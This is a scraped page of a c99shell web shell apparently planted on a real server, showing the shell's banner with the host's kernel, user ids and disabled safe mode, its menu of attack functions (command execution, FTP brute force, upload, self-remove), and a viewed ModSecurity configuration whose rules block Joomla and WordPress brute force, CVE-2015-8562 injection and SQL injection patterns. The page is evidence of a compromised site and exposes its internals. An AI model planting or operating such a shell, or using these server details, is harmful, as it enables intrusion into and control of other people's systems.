msdp.undp.org.ua - c99shell

!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!
Software: Apache/2.2.22 (Debian). PHP/5.6.36 uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) Safe-mode: OFF (not secure) /etc/modsecurity/ drwxr-xr-x Free 1.52 GB of 7.22 GB (21.11%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure)

Safe-mode: OFF (not secure)

/etc/modsecurity/ drwxr-xr-x
Free 1.52 GB of 7.22 GB (21.11%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: hvosting.conf (4.45 KB) -rw-r--r--
Select action/file-type:
(+) | (+) |

(+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

# Drop requests from IPs in blocklist
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:1
SecRule ip:bf_drop "@gt 0" "drop,phase:1,nolog,auditlog,id:2,msg:'ip address %{REMOTE_ADDR} blocked'"

# Wordpress
SecRule REQUEST_BASENAME "^xmlrpc\.php$" "chain,nolog,phase:4,t:none,pass,id:200"
SecRule RESPONSE_BODY    "faultString"   "chain"
SecAction "setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180"

SecRule REQUEST_BASENAME "^wp-login\.php$" "chain,phase:2,nolog,t:none,pass,id:210"
SecRule REQUEST_METHOD   "^POST$"          "chain"
SecRule ARGS_POST_NAMES  "^log$"           "chain"
SecRule ARGS_POST_NAMES  "^pwd$"           "chain"
SecAction "setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180"

# Joomla
SecRule REQUEST_FILENAME "^/administrator/index\.php$" "chain,nolog,phase:2,t:none,pass,id:300"
SecRule REQUEST_METHOD   "^POST$"                      "chain"
SecRule ARGS_POST:option "^com_login$"                 "chain"
SecRule ARGS_POST:task   "^login$"                     "chain"
SecAction "setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180"

## joomla 1.5-3.4.4 session code injection (CVE-2015-8562)
SecRule REQUEST_HEADERS:User-Agent "[\}\|]" "phase:1,nolog,auditlog,drop,msg:'forbidden characters in useragent',id:1100"

SecRule REQUEST_HEADERS:User-Agent "@validateUtf8Encoding" "phase:1,nolog,auditlog,drop,msg:'invalid utf8 in useragent',id:1101"

## joomla 2.5 some com_community vulnerability
SecRule REQUEST_METHOD   "^POST$"      "chain,drop,nolog,auditlog,phase:2,t:none,msg:'forbidden com_community argument code execution',id:1103"
SecRule ARGS_POST:option "^community$" "chain"
SecRule ARGS_POST:arg4   "\"call\""

## joomla 1.5-3.4.4, CVE-2015-8562, another approach  (https://blog.sucuri.net/2016/07/new-realstatistics-attack-vector-compromising-joomla-sites.html)
SecRule REQUEST_METHOD          "^POST$"     "chain,phase:1,nolog,auditlog,drop,msg:'forbidden characters in com_tags filter value',id:1105"
SecRule ARGS:option             "^com_tags$" "chain"
SecRule ARGS_POST:filter-search "[}|]"

SecRule REQUEST_METHOD          "^POST$"     "chain,phase:1,nolog,auditlog,drop,msg:'invalid unicode in com_tags filter value',id:1106"
SecRule ARGS:option             "^com_tags$" "chain"
SecRule ARGS_POST:filter-search "@validateUtf8Encoding"

## joomla 1.5 shop.recommend spam requests
SecRule REQUEST_BASENAME "^index2\.php$"      "chain,nolog,auditlog,drop,msg:'denying spam via joomla shop.recommend',id:1109"
SecRule REQUEST_METHOD   "^POST$"             "chain"
SecRule ARGS_POST:func   "^recommendProduct$" "chain"
SecRule ARGS:page        "^shop\.recommend$"

## joomla 1.5? googlemap plugin v2 proxying requests
SecRule REQUEST_FILENAME "^/plugins/system/plugin_googlemap2_proxy.php$" "chain,nolog,phase:2,t:none,pass,id:1110"
SecRule REQUEST_METHOD   "^(HEAD|GET)$"                "chain"
SecAction "setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180"

## joomla 1.5 com_jce (exploit step 2 - image rename request)
SecRule REQUEST_METHOD "^POST$"       "chain,nolog,auditlog,drop,msg:'block com_jce rename to php request',id:1111"
SecRule ARGS:option    "^com_jce$"    "chain"
SecRule ARGS:task      "^plugin$"     "chain"
SecRule ARGS:plugin    "^imgmanager$" "chain"
SecRule ARGS_POST:json "\.php\""

## joomla com_blog_calendar (http://seclists.org/oss-sec/2016/q4/751)
SecRule ARGS:option    "^com_blog_calendar$" "chain,nolog,auditlog,drop,msg:'block com_blog_calendar sql injection',id:1112"
SecRule ARGS:modid     "[^0-9]"

## joomla com_contact contact form self-cc spam
SecRule REQUEST_METHOD  "^POST$"           "chain,nolog,auditlog,drop,msg:'block com_contact self-cc contact request',id:1113"
SecRule ARGS:option     "^com_contact$"    "chain"
SecRule ARGS:task       "^(contact\.)?submit$" "chain"
SecRule ARGS_POST_NAMES "^(jform\[contact_email_copy\]|email_copy)$" "chain"
SecRule &ARGS:g-recaptcha-response "@eq 0"

## joomla 1.7 com_tag sql injection (https://www.vulnerability-lab.com/get_content.php?id=2061)
SecRule REQUEST_METHOD "^GET$"            "chain,nolog,auditlog,drop,msg:'block com_tag sql injection',id:1114"
SecRule ARGS:option    "^com_tag$"        "chain"
SecRule ARGS:tag       "[^a-zA-Z0-9_.*?+\\-]"

# Httpoxy proxy redirect vulnerability (see http://httpoxy.org)
SecRule &REQUEST_HEADERS:Proxy "@gt 0" "nolog,auditlog,deny,msg:'httpoxy denied',id:1000005"

# Mark IP for blocking, if wrong request counter is over limit
SecRule ip:bf_counter "@gt 4" "nolog,t:none,setvar:ip.bf_drop=1,expirevar:ip.bf_drop=300,setvar:ip.bf_counter=0,id:1000"

:: Command execute ::
Enter:	Select:

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0363 ]--